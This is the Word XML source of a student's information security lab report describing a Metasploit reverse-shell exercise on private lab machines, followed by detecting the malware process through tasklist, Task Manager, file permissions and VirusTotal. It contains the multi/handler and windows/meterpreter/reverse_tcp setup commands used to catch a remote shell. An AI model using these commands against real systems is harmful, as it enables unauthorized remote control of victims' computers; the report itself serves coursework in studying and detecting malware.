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BF39E" w14:textId="77777777" w:rsidR="002E785C" w:rsidRDefault="002E785C" w:rsidP="002E785C">
      <w:pPr>
        <w:pStyle w:val="Title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931044" wp14:editId="52E3AE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23900" cy="581025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapSquare wrapText="bothSides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03A3E479" wp14:editId="4180B785">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>32262</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="857250" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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DB8F5" w14:textId="77777777" w:rsidR="002E785C" w:rsidRDefault="002E785C" w:rsidP="002E785C">
      <w:pPr>
        <w:pStyle w:val="Title1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FAD7090" w14:textId="77777777" w:rsidR="002E785C" w:rsidRDefault="002E785C" w:rsidP="002E785C">
      <w:pPr>
        <w:pStyle w:val="Title1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC40AD2" w14:textId="77777777" w:rsidR="002E785C" w:rsidRPr="007218AF" w:rsidRDefault="002E785C" w:rsidP="002E785C">
      <w:pPr>
        <w:pStyle w:val="Title1"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007218AF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>National University of Computer and Emerging Sciences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADFF135" w14:textId="77777777" w:rsidR="002E785C" w:rsidRPr="008B57AF" w:rsidRDefault="002E785C" w:rsidP="002E785C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C354CB5" w14:textId="77777777" w:rsidR="002E785C" w:rsidRPr="008B57AF" w:rsidRDefault="002E785C" w:rsidP="002E785C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00526AC8">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="020D40B0" wp14:editId="51774B78">
            <wp:extent cx="1716828" cy="1727581"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="8" name="Picture 8" descr="C:\Users\samin.iftikhar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in.iftikhar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220" cy="173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760C" w14:textId="77777777" w:rsidR="002E785C" w:rsidRPr="008B57AF" w:rsidRDefault="002E785C" w:rsidP="00B511CC">
      <w:pPr>
        <w:pStyle w:val="Title2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15D99057" w14:textId="604E3F59" w:rsidR="002E785C" w:rsidRPr="00CA0F66" w:rsidRDefault="002E785C" w:rsidP="00AB5047">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Assignment # </w:t>
      </w:r>
      <w:r w:rsidR="00175B33">
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5683153F" w14:textId="77777777" w:rsidR="002E785C" w:rsidRPr="008B57AF" w:rsidRDefault="002E785C" w:rsidP="002E785C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD30233" w14:textId="77777777" w:rsidR="002E785C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23086972" w14:textId="77777777" w:rsidR="002E785C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14C20B44" w14:textId="1EE5A805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Student:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C575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336E2CD" w14:textId="77777777" w:rsidR="002E785C" w:rsidRPr="008B57AF" w:rsidRDefault="002E785C" w:rsidP="002E785C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:line="276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Abdul Rehman ………… 19L-1135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163106EB" w14:textId="77777777" w:rsidR="002E785C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</w:p>
    <w:p w14:paraId="1BA7CE08" w14:textId="7F630E85" w:rsidR="002E785C" w:rsidRPr="008B57AF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C26D98C" w14:textId="5DC46462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Section:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C575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974A4D5" w14:textId="06DEACBD" w:rsidR="002E785C" w:rsidRPr="008B57AF" w:rsidRDefault="002E785C" w:rsidP="002E785C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:line="276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Information Security (BCS-7H)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE4321B" w14:textId="77777777" w:rsidR="002E785C" w:rsidRPr="008B57AF" w:rsidRDefault="002E785C" w:rsidP="002E785C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:line="276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F97D09E" w14:textId="77777777" w:rsidR="002E785C" w:rsidRDefault="002E785C" w:rsidP="002E785C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:line="36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4E2AEA5B" w14:textId="77777777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Instructor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D7E4C" w14:textId="2523CA2D" w:rsidR="002E785C" w:rsidRPr="008C5755" w:rsidRDefault="002E785C" w:rsidP="002E785C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:line="360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Ahmad Ali Shah</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DD84DC" w14:textId="5D5E6C54" w:rsidR="00FF3CA1" w:rsidRPr="000B4EEF" w:rsidRDefault="00FF3CA1">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBd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0ED6DBE0" w14:textId="5EA8BA98" w:rsidR="00421E4F" w:rsidRDefault="00432EBC" w:rsidP="00AB5047">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB5047">
        <w:lastRenderedPageBreak/>
        <w:t>Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0B4C3D" w14:textId="014199D5" w:rsidR="00AB5047" w:rsidRDefault="00AB5047" w:rsidP="00AB5047"/>
    <w:p w14:paraId="4CB73055" w14:textId="61B695C0" w:rsidR="004D4846" w:rsidRPr="00BA55F0" w:rsidRDefault="00BA55F0" w:rsidP="00AB504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A55F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Prerequisites:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A92554C" w14:textId="684DA214" w:rsidR="00BA55F0" w:rsidRDefault="00BA55F0" w:rsidP="00BA55F0">
      <w:r>
        <w:t>First, I a</w:t>
      </w:r>
      <w:r>
        <w:t>ssign 192.168.10.17 to your Kali Linux machine and 192.168.10.</w:t>
      </w:r>
      <w:r>
        <w:t>56</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC92D53" w14:textId="77777777" w:rsidR="00BA55F0" w:rsidRDefault="00086004" w:rsidP="00BA55F0">
      <w:r w:rsidRPr="00086004">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3621FDFE" wp14:editId="5FACDADD">
            <wp:extent cx="4410075" cy="2352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181" cy="23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05D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BA55F0">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BA55F0">
        <w:t>Run following commands in Kali Linux...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3511CADE" w14:textId="31FB3FBE" w:rsidR="00BA55F0" w:rsidRDefault="00BA55F0" w:rsidP="00BA55F0">
      <w:r>
        <w:t>$ msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A0666B" w14:textId="77777777" w:rsidR="00BA55F0" w:rsidRDefault="00BA55F0" w:rsidP="00BA55F0">
      <w:r>
        <w:t>Msf6&gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5285BA16" w14:textId="77777777" w:rsidR="00BA55F0" w:rsidRDefault="00BA55F0" w:rsidP="00BA55F0">
      <w:r>
        <w:t>&gt; set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F40C611" w14:textId="77777777" w:rsidR="00BA55F0" w:rsidRDefault="00BA55F0" w:rsidP="00BA55F0">
      <w:r>
        <w:t>&gt;set lhost 192.168.10.17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FB5F7B" w14:textId="77777777" w:rsidR="00BA55F0" w:rsidRDefault="00BA55F0" w:rsidP="00BA55F0">
      <w:r>
        <w:t>&gt; set lport 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274CE2B8" w14:textId="77777777" w:rsidR="00BA55F0" w:rsidRDefault="00BA55F0" w:rsidP="00BA55F0">
      <w:r>
        <w:t>&gt; run</w:t>
      </w:r>
      <w:r w:rsidR="00E6605D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E6605D" w:rsidRPr="00E6605D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FA85E3F" wp14:editId="483DB76B">
            <wp:extent cx="3594488" cy="25622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0324" cy="25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BEEA" w14:textId="77777777" w:rsidR="00BA55F0" w:rsidRDefault="00BA55F0" w:rsidP="00BA55F0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Then I ran</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r>
        <w:t>given malware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in Windows. Now</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, I could </w:t>
      </w:r>
      <w:r>
        <w:t>see the Windows shell access.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20602A37" w14:textId="3496B0CD" w:rsidR="00AB5047" w:rsidRPr="00AB5047" w:rsidRDefault="00BA55F0" w:rsidP="00BA55F0">
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ith “help” command, </w:t>
      </w:r>
      <w:r>
        <w:t>I could</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> see the operations you can perform on the Windows host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>with the deployed exploit.</w:t>
      </w:r>
      <w:r w:rsidR="00E6605D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E6605D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E6605D" w:rsidRPr="00E6605D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61178C04" wp14:editId="51CAC977">
            <wp:extent cx="5943600" cy="2781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05D">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A152BA" w14:textId="06CBDABC" w:rsidR="00AB5047" w:rsidRPr="00B511CC" w:rsidRDefault="00175B33" w:rsidP="00B511CC">
      <w:pPr>
        <w:pStyle w:val="Title2"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Pass any three commands to malware through Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E48B4E" w14:textId="77777777" w:rsidR="00BA55F0" w:rsidRDefault="00BA55F0" w:rsidP="00BA55F0">
      <w:r>
        <w:t>The commands I ran were:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E6605D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49D3A003" wp14:editId="4E56E059">
            <wp:extent cx="3003296" cy="3443844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213" cy="34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C8FBF7" w14:textId="77777777" w:rsidR="00BA55F0" w:rsidRDefault="00BA55F0" w:rsidP="00BA55F0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E6605D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E72E2A9" wp14:editId="72815A8E">
            <wp:extent cx="2755075" cy="230914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540" cy="2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40974D4" w14:textId="0B2583BD" w:rsidR="00BA55F0" w:rsidRPr="00AB5047" w:rsidRDefault="00BA55F0" w:rsidP="00BA55F0">
      <w:r>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r>
        <w:t>idletime</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D4846">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60554DFB" wp14:editId="439D8620">
            <wp:extent cx="5943600" cy="388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790" w14:textId="371891F7" w:rsidR="00AB5047" w:rsidRPr="00B511CC" w:rsidRDefault="00BA55F0" w:rsidP="00B511CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>All worked perfectly</w:t>
      </w:r>
      <w:r w:rsidR="00AB5047" w:rsidRPr="00B511CC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ACA197" w14:textId="77777777" w:rsidR="00B511CC" w:rsidRPr="00B511CC" w:rsidRDefault="00B511CC" w:rsidP="00B511CC">
      <w:pPr>
        <w:pStyle w:val="Title2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6151A3E9" w14:textId="017D6BFB" w:rsidR="00AB5047" w:rsidRPr="00B511CC" w:rsidRDefault="00175B33" w:rsidP="00B511CC">
      <w:pPr>
        <w:pStyle w:val="Title2"/>
      </w:pPr>
      <w:r>
        <w:t>Detection of unwanted software/program running in Windows through Command Prompt</w:t>
      </w:r>
      <w:r w:rsidR="00AB5047" w:rsidRPr="00B511CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330C68BD" w14:textId="1EB516BC" w:rsidR="00432EBC" w:rsidRPr="00B511CC" w:rsidRDefault="00BA55F0" w:rsidP="00432EBC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts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  <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>I used tasklist command in windows command prompt to see all running processes and identify the unwanted process “testex.exe”</w:t>
      </w:r>
      <w:r w:rsidR="00421E4F" w:rsidRPr="00B511CC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721EB408" w14:textId="04AFBCCD" w:rsidR="00B511CC" w:rsidRDefault="004D4846" w:rsidP="00B511CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4846">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4438A683" wp14:editId="2AC815DB">
            <wp:extent cx="3474720" cy="350219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7341" cy="35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6E3" w14:textId="77777777" w:rsidR="008E516D" w:rsidRDefault="008E516D" w:rsidP="00B511CC">
      <w:pPr>
        <w:pStyle w:val="Title2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F48DA5" w14:textId="2BCC9AB5" w:rsidR="000B4EEF" w:rsidRPr="00175B33" w:rsidRDefault="00175B33" w:rsidP="00175B33">
      <w:pPr>
        <w:pStyle w:val="Title2"/>
      </w:pPr>
      <w:r>
        <w:t>View the unwanted program / process ID running on Windows and its access rights through Windows GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD3883B" w14:textId="70459FDC" w:rsidR="00BB56BC" w:rsidRPr="00B511CC" w:rsidRDefault="00BA55F0" w:rsidP="00BA55F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lang w:val="en-GB"/>
        </w:rPr>
        <w:t>I viewed the unwanted process in windows task manager.</w:t>
      </w:r>
      <w:r w:rsidR="004D4846" w:rsidRPr="004D4846">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47C5800E" wp14:editId="201B2172">
            <wp:extent cx="4303986" cy="3295123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2007" cy="33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CE06" w14:textId="77777777" w:rsidR="00AD79CF" w:rsidRPr="00B511CC" w:rsidRDefault="00AD79CF" w:rsidP="00B511CC">
      <w:pPr>
        <w:pStyle w:val="Title2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741F70AB" w14:textId="791167EB" w:rsidR="00175B33" w:rsidRPr="00175B33" w:rsidRDefault="00175B33" w:rsidP="00175B33">
      <w:pPr>
        <w:pStyle w:val="Title2"/>
      </w:pPr>
      <w:r w:rsidRPr="00175B33">
        <w:t>Show the system permissions allocated to the malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BDA375" w14:textId="07B3897C" w:rsidR="00421E4F" w:rsidRPr="00B511CC" w:rsidRDefault="00421E4F" w:rsidP="00084B78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 xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00084B78">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>accessed the properties to see the permissions assigned to it by the windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596CD944" w14:textId="039A611E" w:rsidR="00AB5047" w:rsidRPr="00B511CC" w:rsidRDefault="004D4846" w:rsidP="00B511CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4846">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33FE246F" wp14:editId="014FE47F">
            <wp:extent cx="4950372" cy="331822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529" cy="33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7376" w14:textId="07FD210A" w:rsidR="00AD79CF" w:rsidRPr="00B511CC" w:rsidRDefault="00AD79CF" w:rsidP="00B511CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20CDD178" w14:textId="73D2327D" w:rsidR="00AB5047" w:rsidRPr="00B511CC" w:rsidRDefault="00175B33" w:rsidP="00B511CC">
      <w:pPr>
        <w:pStyle w:val="Title2"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175B33">
        <w:t>Check the malware attributes on https://www.virustotal.com/gui/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB1D3FB" w14:textId="1074ABBA" w:rsidR="00AB5047" w:rsidRPr="00B511CC" w:rsidRDefault="00084B78" w:rsidP="00084B7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lang w:val="en-GB"/>
        </w:rPr>
        <w:t>I scanned the unwanted program using the above website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAE6FFE" w14:textId="548C7C43" w:rsidR="00AB5047" w:rsidRPr="00B511CC" w:rsidRDefault="004D4846">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4846">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FAA98AB" wp14:editId="2C87F14E">
            <wp:extent cx="5943600" cy="3655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1FC8" w14:textId="77777777" w:rsidR="00AD79CF" w:rsidRDefault="00AD79CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="203B1642" w14:textId="77777777" w:rsidR="00084B78" w:rsidRDefault="00084B78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0584A79C" w14:textId="79A54A53" w:rsidR="00421E4F" w:rsidRPr="00B511CC" w:rsidRDefault="000B4EEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B511CC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">In conclusion, </w:t>
      </w:r>
      <w:r w:rsidR="00421E4F" w:rsidRPr="00B511CC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">I have profoundly understood the working and methods of </w:t>
      </w:r>
      <w:r w:rsidR="00084B78">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">malware </w:t>
      </w:r>
      <w:r w:rsidR="00421E4F" w:rsidRPr="00B511CC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>for conducting such attacks</w:t>
      </w:r>
      <w:r w:rsidR="00084B78">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> on windows</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00421E4F" w:rsidRPr="00B511CC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD79CF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> And this was a very informative assignment.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00421E4F" w:rsidRPr="00B51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F6930"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D472D57A"/>
    <w:lvl w:ilvl="0" w:tplc="4880EB22">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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05"/>
    <w:rsid w:val="0003360B"/>
    <w:rsid w:val="00084B78"/>
    <w:rsid w:val="00086004"/>
    <w:rsid w:val="000B4EEF"/>
    <w:rsid w:val="00162827"/>
    <w:rsid w:val="00175B33"/>
    <w:rsid w:val="002E785C"/>
    <w:rsid w:val="00421E4F"/>
    <w:rsid w:val="00432EBC"/>
    <w:rsid w:val="004C23EE"/>
    <w:rsid w:val="004D4846"/>
    <w:rsid w:val="005B5976"/>
    <w:rsid w:val="006D3B1C"/>
    <w:rsid w:val="008E516D"/>
    <w:rsid w:val="00AB5047"/>
    <w:rsid w:val="00AD79CF"/>
    <w:rsid w:val="00B511CC"/>
    <w:rsid w:val="00BA55F0"/>
    <w:rsid w:val="00BB56BC"/>
    <w:rsid w:val="00E6605D"/>
    <w:rsid w:val="00EE2CD4"/>
    <w:rsid w:val="00F30905"/>
    <w:rsid w:val="00FF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CE46B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{826C5A23-CFCC-4CA5-8CA6-0829E2D6B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qFormat/>
    <w:rsid w:val="00AB5047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u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:rsid w:val="00AB5047"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="44"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="002E785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Title2">
    <w:name w:val="Title2"/>
    <w:basedOn w:val="TOAHeading"/>
    <w:link w:val="Title2Char"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00B511CC"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Title2Char">
    <w:name w:val="Title2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title2"/>
    <w:rsid w:val="00B511CC"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Title1">
    <w:name w:val="Title1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Subtitle"/>
    <w:rsid w:val="002E785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2E785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8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785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B5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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Abdul Rehman</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <cp:lastPrinted>2022-10-10T00:07:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-09T22:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-21T20:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>